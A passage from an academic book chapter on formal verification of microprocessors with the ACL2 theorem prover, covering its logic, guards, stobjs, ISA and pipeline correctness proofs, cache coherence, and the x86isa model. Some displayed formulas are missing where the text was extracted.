are themselves complex. Many of the theorems can take megabytes even to state!
Enabling mathematical proofs at this scale requires a variety of automated reasoning
features, and it is important that the reader understands the flavor of the features and
scale of engineering involved in practical theorem proving systems. All that said,
the reader does not need to understand everything about the underlying system to
follow the discussions in the next sections. We encourage the reader to skim this
section to get a general idea and come back to it later as a reference when they want
to understand how the models and theorems presented in later sections are really
formalized in the logic.
Logic Basics
A formal logic consists of (1) a formal language for describing formulas, a set of
formulas called axioms, and a set of inference rules that allow derivation of new
formulas from old ones. The key idea is to interpret the axioms as (self-evident)
truths for the artifact (or universe) being modeled by the logic and the inference
rules as validity preserving; consequently, any formula (referred to as theorem)
derived from axioms by applying a sequence of inference rules will also be true.
We will use the logic of the ACL2 theorem prover for most formulas shown in this
chapter. This logic is a quantifier-free first-order logic of recursive functions with
equality. The kernel of the ACL2 logic (Kaufmann and Moore 1997) consists of a
formal syntax, axioms, and some rules of inference. The kernel syntax describes
terms composed of variables, constants, and function symbols applied to a fixed
number of argument terms. The kernel logic introduces the notion of “formulas”
as composed of equalities between terms and the usual propositional connectives.
The logic supported by the theorem prover is an extension of the kernel logic as
described below.
The syntax of ACL2 is the prefix-normal syntax of Lisp (CLHS (Common
Lisp HyperSpec)): the application of a binary function f on arguments a and b
is represented by (f a b) rather than the more traditional f (a, b). However, in
this chapter, we typically use the latter form, referring to the formal syntax only
when it is relevant for the discussion. We also use more conventional notations
for commonly used functions, thus writing (x × y) instead of (* x y) and
(if x then y else z) instead of (if x y z), dropping parentheses when it is
unambiguous to do so.
ACL2 has axioms specifying properties of certain Common Lisp primitives. We
show below the axioms about the primitives equal and if . Note that the kernel
syntax is quantifier-free, and each formula is implicitly universally quantified over
all free variables in the formula.
1326 S. Goel and S. Ray
Axioms.
x =y ⇒ equal(x, y) =T
x = y ⇒ equal(x, y) = NIL
x = NIL ⇒ (if x then y else z) =z
x = NIL ⇒ (if x then y else z) =y
equal(car(cons(x, y)), x)
The axiom stands for the formula equal (car ( cons (x, y)), x) = NIL, which
is provably equal to car (cons (x, y)) = x. In this chapter, we will feel free to
interchange terms and formulas by the above convention. We will also apply the
same logical connectives to a term or formula; thus, when we write ¬τ for a term
τ , we mean the term (or formula) not (τ ), where not is axiomatized as follows.
Axiom.
The duality between terms and formulas enables us to interpret an ACL2 theorem
as follows. If the term τ (interpreted as a formula) is a theorem, then for all
substitutions σ of free variables in τ to objects in the ACL2 universe, the (ground)
term τ/σ evaluates to a non-NIL value; NIL can thus be viewed as logical false.
The kernel logic includes axioms that characterize the primitive Lisp functions
over numbers, characters, strings, constant symbols such as T and NIL, and ordered
pairs. These objects together make up the ACL2 standard universe, but the axioms
do not preclude “nonstandard” universes which may contain other objects. Lists
are represented as ordered pairs, so that the list (1 2 3) is represented by
the term cons (1, cons (2, cons (3, NIL))). For brevity, we will write list (x, y, z)
as an abbreviation for cons (x, cons (y, cons (z, NIL))). Another convenient data
structure built out of ordered pairs is the association list (or alist) which is
essentially a list of pairs, e.g., list (cons (‘‘a’’, 1), cons (‘‘b’’, 2)). We often
use alists for describing finite mappings; the above alist can be thought as a mapping
that associates the strings ‘‘a’’ and ‘‘b’’ with 1 and 2, respectively.
In addition to propositional calculus and equality, the rules of inference include
instantiation and well-founded induction up to ε0 (Here ε0 is the least ordinal
37 Microprocessor Assurance and the Role of Theorem Proving 1327
The formula may appear a bit complicated at first glance and can be skipped on
a casual read. For the reader interested in understanding what it stands for, it can be
interpreted as follows. Let y be an ordinal less than ε0 and consider a formula ϕ(y).
Suppose we can prove that if ϕ(x) holds for each x ≺ y, then we can also prove
ϕ(y). That is, by assuming all smaller instances (according to the relation “≺”) of
the formula ϕ(x), we can prove ϕ(y). Then the formula ϕ(y) holds. Note that this is
the crux of traditional induction, except that the concepts are adapted to induction
on ordinals up to ε0 (rather than natural numbers). ACL2 implicitly assumes all such
formulas as axioms.
Finally, ACL2 only allows construction of theories that are extensions of GZ
via the extension principles explained below, which allow axiomatization of new
function symbols. When a new function symbol is introduced via the extension
principles, the resulting theory T is the extension of the original theory T
with (i) the axiom explicitly introduced by the extension principle and (ii) all the
induction axioms in the language of the new theory.
Extension Principles
ACL2 provides extension principles allowing the user to introduce new function
symbols. Below, we discuss one extension principle which is particularly relevant
to us, i.e., the definitional principle for introducing totally defined functions. Other
extension principles include an encapsulation principle for introducing partially
defined or constrained functions, a defchoose principle for introducing Skolem
(choice) functions, and a defaxiom principle that enables the specification of a
formula as an axiom. The latter is discouraged since the introduction of arbitrary
1328 S. Goel and S. Ray
axioms is potentially unsound. For this chapter, unless explicitly mentioned other-
wise, we ignore introduction of arbitrary axioms.
The definitional principle allows the user to extend a theory by axiomatizing new
total (recursive) functions. For example, one can use this principle to introduce the
unary function symbol fact axiomatized as follows, which returns the factorial of
its argument.
Definitional Axiom.
natp(fact(x)) = T
(¬τ1 . . . ¬τn τ ), which is viewed as the disjunction of its elements (literals). ACL2
has a hint mechanism which the user can use to provide pragmatic advice on
proof search at any goal or subgoal; in this example, the user can advise ACL2
to begin the search by inducting on x. Once a theorem is proven, it is stored in a
database and used in subsequent derivations. This database groups theorems into
various rule classes, which affects how the theorem prover will automatically apply
them. The default rule class is rewrite, which causes the theorem prover to replace
instances of the left-hand side of an equality with its corresponding right-hand side;
if the theorem fact-is-natp above is stored as a rewrite rule, then if ACL2
subsequently encounters a term of the form natp(fact (τ )), then the term is rewritten
to T.
ACL2 is closely tied with Common Lisp. It employs Lisp syntax, and as of
this writing, ACL2 can be built on top of all major Common Lisp distributions
(Allegro Common Lisp, CCL, GCL, LispWorks, and SBCL). Furthermore, events
corresponding to the definitional principle are Lisp definitions. For instance, the
formal event introducing fact also serves as a Common Lisp definition:
(defun fact (n)
(if (zp n)
1
(* n (fact (- n 1)))))
The connection with Lisp enables users to execute formal definitions efficiently;
ACL2 permits the execution of all functions axiomatized in GZ, as well as any
function whose definition does not involve any constrained functions. The theorem
prover makes use of this connection for simplifying ground terms. For instance,
during a proof, ACL2 will automatically simplify fact (3) to 6 by evaluation (also
referred to as “concrete execution”).
The fact that the same functions are used for concrete execution as well as formal
reasoning offers the advantage that a model of a computing system built in ACL2
can be validated against the real system or a trusted “golden” model by running
co-simulations. This increases confidence in the accuracy of the formal model and,
by extension, in the guarantees offered by formal analysis done using this model.
For instance, one accomplishment of ACL2 is the formal verification of a formal
microarchitectural model of Rockwell Collins AAMP™ processor (Greve et al.
2000). The formal proof shows that the formal model satisfies the desired property
but leaves open the possibility that the physical artifact has not been accurately
captured by the formalization. The latter question can be effectively answered (and
was in fact addressed in this case) by extensive co-simulation of the actual artifact
with the formal model. The x86 formalization we discuss in Section “Deep Dive:
Formalization and Analysis of (Simplified) x86” has also been “vetted” with the
real implementation through such co-simulation. Below, we discuss some features
offered by ACL2 to optimize the execution efficiency of its functions.
1330 S. Goel and S. Ray
The above implies that (1) it is unsound to simply execute a function in Lisp to
determine the return value specified by the axioms on concrete inputs if the inputs
are outside the intended domain, but (2) it is sound to do so if the inputs are within
the intended domain. The notion of guards formalizes this idea of intended domain.
A guard of a function is simply a formula G that must be satisfied to ensure that if
the inputs satisfy G , then the return value of the function is consistent with Common
Lisp. For instance, the guard of car(x) is the formula consp(x) ∨ (x == NIL).
The notion of guards extends to user-defined functions as well. For example,
consider defining a new function two as follows. The function always returns the
number 2 (and can be proven as such by ACL2).
Definitional Axiom.
In order to use Common Lisp for evaluating the function two, the guard of any
function called involved in its body must be satisfied. Here there are two such
functions, both Common Lisp primitives, eq and car . The function eq is simply
equality but is a faster variant implemented by fast pointer check. The guard for
eq (x, y) is symbolp(x)∨symbolp(y) where symbolp returns T when its argument
is a symbol and NIL otherwise. Putting this together with the guard of car , the
guard of the function two is given by the formula (consp(x) ∧ symbolp(car (x)).
37 Microprocessor Assurance and the Role of Theorem Proving 1331
Must Be Equal
ACL2 uses guards to produce other more sophisticated features supporting fast
execution. One such feature is must-be-equal (MBE for short) (Greve et al. 2008).
The key idea is to enable two definitions of a function, one to be used for logical
reasons (e.g., for proofs) and another for fast execution efficiency. To motivate the
idea, consider the function lng as follows, which computes the length of a list.
Definition.
Here, the function cdr is a primitive Lisp function that takes a list as argument
and returns a modified list after removing the first element. The function lng
can have a guard consp(x) ∨ (x = NIL), and such a guard can be verified by
ACL2. Even after guard verification; however, evaluation of lng on a large list
argument with Common Lisp will typically encounter a stack overflow because of
the recursive call. A more execution-friendly definition could be the following:
Definition.
Since the function lnga is tail recursive, good Common Lisp compilers will
compile this function into a simple loop with no stack allocation on recursive
function calls. On the other hand, it is a more complex function to reason about.
The MBE feature enables the user to use these two different definitions of lng – the
user uses the first definition as a logical definition and the second with a directive to
use for execution purpose only.
Definition.
The guard for MBE includes the proof obligation that the two definitions are
equal (under the guard of the function), a nontrivial one-time cost. This proof
obligation is part of the guard verification, i.e., conceptually, one imagines the guard
of MBE to be the requirement that the two definitions are logically equivalent.
1332 S. Goel and S. Ray
Single-Threaded Objects
The third execution feature of ACL2 we cover in this chapter is single-threaded
objects (“stobj” for short) that provides the benefit of destructive updates (Boyer
and Moore 2002). Note that a fundamental tenet of mathematics is that the
function f (x) returns the same value for each invocation with the same argument
x; i.e., (x = y) =⇒ (f (x) = f (y)). This notion is, of course, not true if f is
implemented in a computer program (even if f does not have side effects) where
x is a variable: x can be updated (e.g., by an assignment) between two successive
invocations of f (x). The idea of stobjs is to enable declaration of variables that can
be destructively updated while enabling logical reasoning. Following is an ACL2
declaration that defines the variable obj to be a single-threaded object.
(defstobj obj
(field-a :type (array (unsigned-byte 64) (1024)))
(field-b :type (signed-byte 16)))
Logically, obj is a list of two elements; the first element field-a is itself a
list of 1,024 elements, each of which is a 64-bit unsigned integer, and the second
element field-b is a 16-bit signed integer. Under the hood, obj is implemented
as a one-dimensional array with field-a defined as a simple array of 1,024 64-
bit unsigned integers and field-b as another simple array containing 1 16-bit
signed integer element. Furthermore, the above declaration also defines functions
update-obj , update-field-a, update-field-b, etc. Logically, update-field-a returns
a (new) list with the appropriate entry updated, update-field-b returns a new value,
and update-obj returns a new pair. However, again under the hood, the updates are
actually implemented destructively on the object obj. The logical view is recon-
ciled with the implementation by enforcing syntactic restrictions on the manner in
which the functions manipulating stobjs can be invoked. Roughly, every function
that updates (any field of) a stobj must return the updated stobj. Furthermore,
updates to different fields of stobj are sequentialized, and two functions f and g
cannot take the same stobj and update different fields; instead, f (resp., g) must
take the updated stobj returned by g (resp., f ) to perform its own updates.
Single-threaded objects are crucial to defining efficient ISA and microarchitec-
tural models. As we will see in the next section, these models often involve defining
how different instructions update machine states. Fast simulation of these models
depend on fast (destructive) updates to machine states. In the x86isa model,
discussed in Section “Deep Dive: Formalization and Analysis of (Simplified) x86”,
we will see the use of stobjs to specify the x86 machine state.
ISA Analysis
the view provided is of a machine that executes (binary) code one instruction at a
time. This section discusses ISA formalization and its applications.
ISA Formalization
Definition.
The function ISA.run computes the architectural state of the machine after execut-
ing n instructions. The function ISA.step (and correspondingly, ISA.run) formalize
the ISA, but they are mathematical functions about which one can prove different
properties. Here is one such “obvious” property about the ISA.run function, which
is easy to prove by induction on m. Note that the property is true for ISA.run
independent of the definition of ISA.step.
Lemma.
The above lemma is illustrative and fundamental. But it is not perhaps “inter-
esting” to an architect looking to verify properties of a specific ISA. However,
one can verify ISA-specific properties as well. One interesting direction is to
relate two different ISA models. In particular, consider designing an abstract and
highly simplified ISA model specified by the function ISA.abstract.step that
defines arithmetic operations as mathematical function. For instance, we define the
corresponding effect function ISA.abstract.effect such that if the instruction I is
an ADD, then the result that is stored in the target register is the infinitely precise
mathematical sum of the operand. Obviously, such an ISA would not be realizable in
any practical architecture. But it is a useful mathematical abstraction, since after all
we think about the ADD operation as some approximation of the mathematical sum.
Once this is done, we can, of course, formalize another more elaborate ISA model
ISA.practical.step in which the arithmetic operations are formalized to include all
practical bells and whistles, e.g., rounding, truncating, overflow and underflow flags,
etc. We can then prove a theorem roughly stated as follows:
If a program never raises any overflow or underflow errors, then the execution of the
program on the simplified ISA model has the same effect as executing it under the more
elaborate model.
Section “Some Formalized ISAs”. But we bring that up here to illustrate a specific
proof that was done to show correspondence between two models M3 and M4. The
key difference between the two models is multi-threading: M4 is a multi-threaded
model while M3 is not. A theorem that was formalized and mechanically proven by
ACL2 relating these two machines can be roughly paraphrased as follows.
Let π be any M4 program that never spawns a thread. Then, the effect of executing π on
M4 is the same as the effect of executing π on M3.
Of course, care is necessary to make the statement precise. Formalizing the state-
ment “the effect is the same in both machines” entails designing a function (referred
to as the projection function) that takes an M4 state s, eliminates components that
are irrelevant to multithreading ( e.g., registers keeping track of different threads)
and creates a state s’that can be used by the state transition function for M3.
1: X:=0; {T}
2: Y:=10;
3: if (Y ≤ 0) goto 7; {(X + Y) = 10}
4: X:=X+1;
5: Y:=Y-1;
6: goto 3;
7: HALT {X = 10}
The clock function for this program can be defined as follows. Note that the
definition closely mimics the actual loop structure of the program. In particular,
consider the function lpc (which stands for “loop clock”). If the machine is in a
state s where the program counter has the value 3, then lpc (s) merely counts the
number of steps before the loop is exited.
Definition.
lpc (s) = if zp(Y (s)) ∨ ¬prog-loaded (s)then 0 else 4 + lpc (ISA.run(s, 4))
clock (s) = 2 + lpc (ISA.run(s, 2)) + 1
Once the appropriate clock function is defined, we can try to prove the total
correctness theorem. To do so, we must prove a theorem that characterizes the loop
itself. One possibility is to prove the following lemma:
Lemma.
Here, upd (s, a, b) is the state obtained by assigning the value a to component X
and the value b to component Y, respectively, in state s. The formula can be proven
as a theorem by induction based on the term lpc (s). The proof of the theorem
Total Correctness then follows from this theorem and the lemma on the
composition of ISA.run.
Formal ISA models have long been used as a specification for the verification of pro-
cessor microarchitectures as well as machine code. Hunt’s FM8501 processor (Hunt
37 Microprocessor Assurance and the Role of Theorem Proving 1337
1994) was an early case study which successfully expressed a generic processor’s
specification and design in the formal logic of a theorem prover. The CLI stack
project (Bevier et al. 1989) used NQTHM (Boyer et al. 1995), a predecessor of the
ACL2 theorem prover, to formally verify a “stack” of systems, from a gate-level
microprocessor design (Hunt 1989) to an assembler (Moore 1996) that compiled to
this microprocessor and, finally, a higher-level language (Young 1989) that targeted
this assembler. The CLI stack set a milestone in the history of the design and
verification of software and hardware and continues to inspire many undertakings
like the recent Provably Correct Systems (ProCoS) projects (He et al. 1994). Sawada
et al. used ACL2 to verify the pipelined execution of FM9801 (Sawada and Hunt
2002b), a processor that supported speculative execution, out-of-order instruction
issue and completion, and exceptions and interrupts; the correctness property was
that FM9801’s pipelined execution from one flushed state to another is comparable
to sequential execution. Rockwell Collins developed a formal model (Greve 1998)
of their JEM1 microprocessor in the PVS theorem proving system (Owre et al. 1992)
for microcode verification. A Rockwell Collins project used ACL2 to verify that
the microcode of AAMP7G™ processor was compliant with the EAL 7 standard
security specification (Wilding et al. 2010).
Boyer and Yu formalized most of the user-mode instruction set of the Motorola
MC68020 microprocessor (Boyer and Yu 1996) in NQTHM. This ISA model was
used to verify the machine code corresponding to the Berkeley string library. Lie and
Moore formalized the Java Virtual Machine (JVM) in ACL2 (Liu and Moore 2004)
in order to reason about JVM bytecode. A subset of the x86 ISA was formalized in
ACL2 and used to perform machine-code verification of both system and application
programs. This model was later used to verify parts of the x86 microarchitecture;
details are in Section “Deep Dive: Formalization and Analysis of (Simplified)
x86”. Another specification of the x86 ISA (Degenbaev 2012) formalized the x86
instruction semantics using a domain-specific language and specified the total-store-
ordered memory model by accounting for caches, translation look-aside buffers,
fences, locks, etc.
The CHERI (Capability Hardware-Enhanced RISC Instructions) ISA (Watson
et al. 2016) is an architecture that provides software compartmentalization by
supporting a hybrid capability model (Levy 1984) at the level of the processor
itself. Formal models of CHERI ISA have been developed using L3 (Fox 2015),
a domain-specific language for instruction-set descriptions, and PVS. Recently,
Arm released executable specifications of its ISA (Arm ISA Specifications), where
instructions’ semantics have been formalized using a domain-specific specification
language called ASL. Arm has successfully used these specifications to verify
parts of the Arm microarchitecture (e.g., pipeline control logic) (Reid 2016; Reid
et al. 2016). This ASL specification has also been translated into Sail (Armstrong
et al. 2019), an open-source domain-specific language intended for specifying ISAs,
and from Sail to the Isabelle/HOL theorem prover (Nipkow et al. 2002; Gordon
and Melham 1993); the resulting Isabelle/HOL definition was used to reason
about the compartmentalization (CHERI) properties of the Arm-based Morello
architecture (Bauereiss et al. 2021).
1338 S. Goel and S. Ray
The ISA formalization discussed in Section “ISA Formalization” shows the basics
of how one can formalize a computing system, e.g., by defining the state transition
function in the logic of the theorem prover. The high-level modeling approach
applies essentially unchanged to modeling a microarchitecture, except that the
“effect function” is more detailed. Just like the function ISA.effect (s, I ) models the
effect of executing instruction I on the architectural state s, one can define a func-
tion ma-effect (m, I ) that defines the effect of “executing” I on a microarchitectural
state m. Note that we have put the term “executing” in quotes: in a microarchitecture,
the notion of executing varies depending on the microarchitectural component being
investigated. For instance, if we are analyzing an in-order pipelined microprocessor,
ma-effect (m, I ) may define the effect on the microarchitecture state as the
instruction moves from one pipeline stage to another. On the other hand, for an
out-of-order processor, ma-effect (m, I ) would need to account for transition of the
instruction through the issue queue, reservation station, reorder buffer, etc.
Pipelining
To understand how pipelining can complicate verification, let us quickly summarize
how one can verify a non-pipelined microarchitecture. Simulation correspondence
can be informally described as follows. One defines a predicate sim as a relation
between the states of MA and ISA with the following properties: (In practice, we
use simulation for non-deterministic systems, which can be formalized with step
taking an additional argument that models a non-deterministic input. In this chapter,
we ignore issues involving non-determininstic concurrent systems.)
37 Microprocessor Assurance and the Role of Theorem Proving 1339
The theorem is shown more often as a diagram such as in Fig. 2. This can be cast
as a simulation proof by defining the simulation relation to be defined as follows:
Definition.
MA−step
MA state MA state
1340 S. Goel and S. Ray
flush flush
MA−step
MA state MA state
Flushing Proofs. One approach to address the above issue was presented by Burch
and Dill in 1994 (Burch and Dill 1994), as an approach to compare MA states
with ISA states, where the MA now is a pipelined machine. This approach is
known as flushing correspondence. The notion is shown pictorially in Fig. 3. To
construct an ISA state from an MA state, we simply flush the pipeline; that is,
complete all partially executed executions in the pipeline without introducing any
new instruction. We then project the programmer-visible components of this flushed
state to create the ISA state. Then, the notion of correctness says that MA is correct
with respect to the ISA, if whenever flushing and projecting an MA state mayields
the state isa, it must be the case that for every possible next state ma in MA from
ma, there must be a state isa in ISA such that (1) isa can be reached from isain one
ISA step, and (2) flushing and projecting from ma yields isa .
Unfortunately, flushing has its own limitation. First, note that the diagram shown
in Fig. 3, unlike the diagram in Fig. 2, does not render itself directly to a proof of
simulation correspondence or trace containment. This is because proj (flush(s))
maps a state s of a pipelined machine MA to a state with possible different values of
observable components (or label). Manolios’ (Manolios and Johnson 2000), certain
types of flushing diagrams are flawed in that trivial, obviously incorrect machines
satisfy such notion of correctness.
cannot directly handle interrupts. This problem (i.e., microarchitectural states being
mapped by flushing to potentially inconsistent ISA states) is exacerbated with out-
of-order and speculative executions, where obviously an MA state can include
partially completed executions that may be completed in a different order than if
the system were flushed (out-of-order execution), or maybe even not completed at
all (speculative execution).
In spite of the challenges above that have so far precluded a general notion of
correctness for microprocessors with advanced control, there has certainly been
significant work on formal verification of microarchitecture models with such
features. Much of the work has been custom, i.e., specific correctness properties
proven for a specific system. One of the most comprehensive formal proofs was
from Sawada and Hunt (Sawada and Hunt 2002a), which formalized and verified
microprocessor named FM9801 with features such as out-of-order and speculative
execution, interrupts, exceptions, and self-modifying code. The correctness proof
they verified is roughly summarized as follows:
Let MA0 be a flushed state and suppose after n transitions the microarchitecture reaches
another flushed state MAn . Let the projection of MA0 be ISA0 and let the projection of MAn
be ISAm . Suppose the interrupt register specifies a sequence of interrupts Σ. Suppose also
that there is no exception in the transition sequence of MA, and no self-modifying code is
executed. Then there is a sequence of transitions from ISA0 to ISAm and the sequence of
interrupts serviced in the process by ISA is Σ.
Of course, we note that the above theorem does suffer from the problems pointed
to by Manolios: a trivial machine that never reaches the flushed state satisfies these
criteria. However, the FM9801 machine is not a trivial microarchitecture, and the
theorem is a nontrivial result for a microarchitecture with advanced features.
We primarily focused in this section on the notion of correctness, since that is
controversial and a target of lively debate. Of course, another issue is to actually
do the proof. Without standardization, these proofs tend to be highly custom-built.
Nevertheless, some interesting insights have emerged over the years on how to
approach the verification. One critical insight is that we must define an invariant,
i.e., a predicate that holds for each microarchitectural state encountered during
execution. In other words, one defines a function inv to satisfy the following
conditions:
Invariant Properties.
Sawada and Hunt’s work showed how to do this manually. They defined an
auxiliary structure, called MAETT, that is used for keeping track of the history
of execution of the different instructions through the pipeline. In other words,
MAETT keeps track of which instruction is at what stage of completion and how
the instruction would be expected to proceed in subsequent transitions. Then inv
1342 S. Goel and S. Ray
simply establishes that the pipeline indeed results in an execution consistent with the
tracking of MAETT. This approach is certainly viable (as they showed) but highly
tedious. Subsequently, significant work has been done to automate invariant proving
itself, e.g., by designing techniques called predicate abstraction (Lahiri et al. 2003;
Saidi and Shankar 1999; Ray and Sumners 2007).
The term “memory hierarchy” refers to the hierarchy of cache levels, main memory,
and virtual memory in a modern microprocessor system. The ISA models as
described in Section “ISA Analysis” typically do not account for these features.
Instead, a LOAD or STORE instruction is typically formalized as a direct and atomic
access or update of the relevant memory location. This simplistic formalization is a
high-level view of the ISA that is consistent with the programmer’s expectation of
the microprocessor functionality. On the other hand, this means that there is proof
obligation to ensure that the memory systems developed in modern microprocessors
indeed implement the abstraction provided by the ISA.
Consider a multiprocessor system shown where each processor has access to
private L1 and L2 caches. An obvious problem for such systems is cache coherence,
i.e., making sure that a read from a private cache would result in the same data
being read as if the processor had read it (atomically) from the main memory.
Concretely, consider the following simple memory system, which we call memory.
The transition function of memory, memory.next is shown in pseudocode in
Fig. 4.
Verification of a multiprocessor system with cache entails showing a corre-
spondence between the executions of the microarchitectural model with the simple
memory system discussed above. Architecturally, cache coherence is ensured by a
protocol that allows a memory block to be loaded in the cache either (1) in read-
only mode, in which case no private cache is allowed to have a writable copy of
the block, or (2) in read-write mode, in which case only one private cache has
(exclusive) access to the block and no other private cache would have a copy of the
block. Unfortunately, these protocols tend to be highly complex. Indeed, verification
of cache coherence protocols is an extremely active areas of research with several
interesting approaches.
Theorem proving has played an active role in the verification of cache coherence.
A key advantage of theorem proving in the application of such protocols has been
to exploit the full power of formal mathematics and logic, to deal with the infinite
states. The lemmas and proofs so obtained exactly show the invariants of the verified
protocols and why the invariants hold. In contrast, algorithmic methods typically
account for a small (finite) instance of the protocol, e.g., a system with (say) 4
processes. Nevertheless, the challenge with theorem applying theorem proving on
memory protocols has been to come up with invariants. There have been two key
directions to address this problem. In one direction, there have been ways to improve
the automation of invariant discovery itself. This has resulted in a rich area of
predicate abstraction (Graf and Saidi 1997; Lahiri et al. 2003; Ray and Sumners
2007). The key idea is to start with a set of predicates and apply the state transition
of the system to identify how the predicate changes. For example, if one predicate
specifies the property that a specific cache line is invalid, then a read request would
cause the predicate to go from false to true. One can correspondingly develop an
abstract state graph of the system which can be finite even if the target system one
started with was unbounded. Another direction of research has been to formalize
the protocols themselves in a different way to enable easy capture of invariants. For
instance, instead of formalizing the state transition, the system can be formalized in
terms of flows (Talupur et al. 2015).
The design of execution units, which include ALUs that implement integer,
cryptographic, and floating-point operations, is datapath intensive. The verification
of execution units entails proving the correctness of micro-operations or uops
implemented in these units. The cost of undetected bugs in execution units can be
enormous–Intel’s FDIV “flaw” (Pratt 1995) is just one (in)famous example. It is
difficult for random or even targeted simulations to achieve complete verification
coverage for such designs. Additionally, the state space for such operations has
increased over the years–for instance, x86’s AVX512 instructions can have two or
more 512-bit wide operands.
Theorem proving has been extensively used for verification of a variety of
floating-point algorithms as well as their RTL implementations. ACL2 has been
used for verifying floating-point units of its AMD’s K5™and K7™processors
(Moore et al. 1998; Russinoff 1998). In addition to the verification itself, this
resulted in one of the most extensive formal treatments of computer arithmetic in
the logic of a theorem prover (Russinoff 2018).
Many execution unit operations are verified using symbolic simulation–i.e., both
the design and the specification are symbolically simulated on the same inputs,
and then their resulting outputs are compared for equivalence. The good news is
that modern off-the-shelf commercial model checkers and SAT solvers can achieve
complete coverage of many fixed-cycle operations–indeed, verification of these
operations can proceed automatically once the properties have been written (Pouarz
and Agrawal 2016; Mukherjee et al. 2015, 2016). However, complex operations
like multiplication (integer as well as floating-point), floating-point addition, fused
multiply-addition, division, and square root still require human-assistance for a
variety of reasons.
1344 S. Goel and S. Ray
obligations (Swords and Davis 2011; Davis et al. 2014; Kaivola and Kohatsu 2003).
This approach leverages the benefits of both interactive and automated verification
techniques. Moreover, in case of decompositions, the theorem prover can be used
to compose together all the individual cases–proved either by symbolic simulation
inside the prover or with an automated tool–to make sure that there are no holes in
coverage.
We now describe an ACL2 library called x86isa (Goel 2016) that models a subset
of the x86 Instruction Set Architecture. This x86isa model is intended to provide
a mathematical description of the x86 architecture at the same level of discourse
as is found in the official Intel® Software Developer’s manuals (Intel SDMs) (Intel
Corporation 2020). Thus, it is a specification of the x86 ISA in the sense that it
formalizes the expected observable behavior of an x86 processor. One can view
x86isa as a simulator that can perform concrete as well as symbolic execution of
x86 instructions, the latter of which is a crucial step toward general-purpose property
verification. As such, this model can be used in a variety of projects in the fields of
software, hardware, and compiler verification.
In this section, we discuss the design of x86isa and focus on some aspects
that enable its role as a formal specification for x86 microarchitecture. We also
discuss how this model can be used to test and verify properties of microarchitecture
components by describing a recent application of x86isa toward verifying Centaur
Technology’s x86 instruction implementations (Goel et al. 2020, 2021; Goel and
Sumners 2019). The goal here is to use x86isa as a case study to give the reader
some insight into the development of models that are used for formal verification
and to provide an overview of their general capabilities and limitations.
Approach
The x86isa model specifies the x86 ISA in a manner described earlier in
Section “ISA Analysis”–the behavior of the machine is captured by an interpreter
(i.e., an ISA.run function) that operates over the machine state. This interpreter
essentially models the fetch-decode-execute cycle of an x86 processor.
The four core components of x86isa are the following:
Machine State: The machine state is modeled using a stobj whose fields describe
the basic execution environment of an x86 processor (ref. Figure 3-2: 64-Bit Mode
Execution Environment, Chapter 3, Intel SDMs). As of this writing, it contains the
program counter, general-purpose registers, flags registers, floating-point registers,
XMM/YMM/ZMM registers, segment registers, system table registers, control and
debug registers, model-specific registers, and a memory model. Additionally, the
machine state contains some fields that are an artifact of the model and not of the
1346 S. Goel and S. Ray
x86 architecture–the purpose of these fields is to store information about the model’s
operation. For example, if any unimplemented x86 operation is encountered, then a
special field called the model status is populated with appropriate information.
Step Function: The step function models a single step in the processor’s execution,
i.e., one fetch-decode-execute cycle. It takes an initial machine state as input and
returns an updated state. The program counter contains the memory address of the
instruction to be executed next; this instruction is fetched from the memory and if
the fetch is successful, it is decoded. Then, control is dispatched to the appropriate
instruction semantic function, which updates the machine state with the final effects
of that instruction. If, at any point, an error is encountered, execution halts, and the
also model status field is populated with an informative error message.
Run Function: The run function is the x86 ISA interpreter. It takes n, the number
of steps to be executed and the initial machine state as inputs, and executes the step
function n times or until an error or a halt instruction is encountered, whichever
comes first. It returns the updated machine state.
The first step needed to simulate an x86 machine program on x86isa is
to initialize the model state appropriately–i.e., store that program in the model’s
memory, populate the program counter, registers, and other memory locations, if
necessary. Then, the run function is called. The final effects of the program can
be observed by comparing the resulting machine state with the starting state. The
contents of the machine state can be observed at any desired level of granularity–
either after the execution of each instruction or a set of instructions, or at certain
breakpoints, or when the run function terminates.
The values used to initialize the model state can either be concrete or symbolic.
Concrete values are used when the model is used as an ISA simulator, and symbolic
values are used when the model is used to perform formal analysis. Symbolic values
allow the consideration of many, if not all, possible executions at the same time.
Even parts of the program can be symbolic!
Design Considerations
A useful specification should describe the behavior of the system it models in a
way that is easy to understand; this description should be an accurate representation
of the system. Additionally, it is helpful if specifications are accompanied by tools
that facilitate their use as verification frameworks and simulators. The design and
development of a specification can be done deliberately with these goals in mind.
The primary purpose of x86isa is to provide a mathematical specification of
the x86 ISA that is suitable for use in formal analyses. We discuss how the x86isa
library incorporates these goals and the role ACL2 plays toward achieving them.
Easy to Understand: In this project, the x86 ISA specification is simply exe-
cutable code written in ACL2’s programming language. Merely the executable
nature goes a long way toward achieving this goal: one can simply run x86isa
to observe what it does. Additionally, the code is documented, with both user- and
developer-oriented topics accessible online (x86isa: Documentation2022). The
sources which were consulted to write the specification functions are often cited
in the source code–these citations point to relevant lines from specific sections of
the Intel manuals. For many topics, the documentation is generated automatically
from the code, which keeps them synchronized with each other. In further support
of this goal, the specification functions are not optimized for execution efficiency
(see Goal “Unified Model for Simulation and Formal Verification:” for a discus-
sion regarding execution efficiency). Such optimizations can often complicate the
algorithm implemented by that code, which can not only make the code difficult
to comprehend but can also introduce bugs. As such, the specification functions
implement a simple, straightforward algorithm. The simplicity of the specification
functions is also what makes them amenable to be used in formal verification
efforts–that is, these functions offer reasoning efficiency. Often, if a function is easy
to understand, then it is easy to reason about.
Accurate: This goal is a little more difficult to address. How do we know that
x86isa models the x86 ISA accurately? After all, code can have bugs, due
to programming oversights or misunderstandings of the system being modeled.
Again, the simplicity of the specification functions helps–simpler code is easier
to review. However, the x86 ISA is a large and complex architecture, and code
reviews can only take us so far. Ideally, though the formal model is trusted, we
would like it to be tested as well. Another way to build confidence in the model’s
accuracy is by performing co-simulations–we compare the results of program runs
on x86isa with those on a real x86 processor. (In an industrial setting, co-
simulations can also be done against an internal “Golden Model”.) This immediately
raises an important point: if a formal model is validated using simulation, then any
mathematical guarantees provided by using the formal model eventually depend on
the guarantees offered by simulation. Why then is it worth using a formal model
and incurring the overhead of theorem proving in the first place? The answer lies
in separation of concerns. Formal models are designed for the express purpose
of being specifications of the system under verification–their development is free
1348 S. Goel and S. Ray
from the pressures to optimize code for execution, and the focus is entirely on
capturing the system’s behavior. Thus, the reliance on simulation for the validation
of formal models is not as total as it may seem at first glance. Additionally, one
can use ACL2 to prove properties about the formal model itself. For instance,
one can prove noninterference theorems about specification functions that are not
supposed to conflict with each other. As such, running as many simulations as
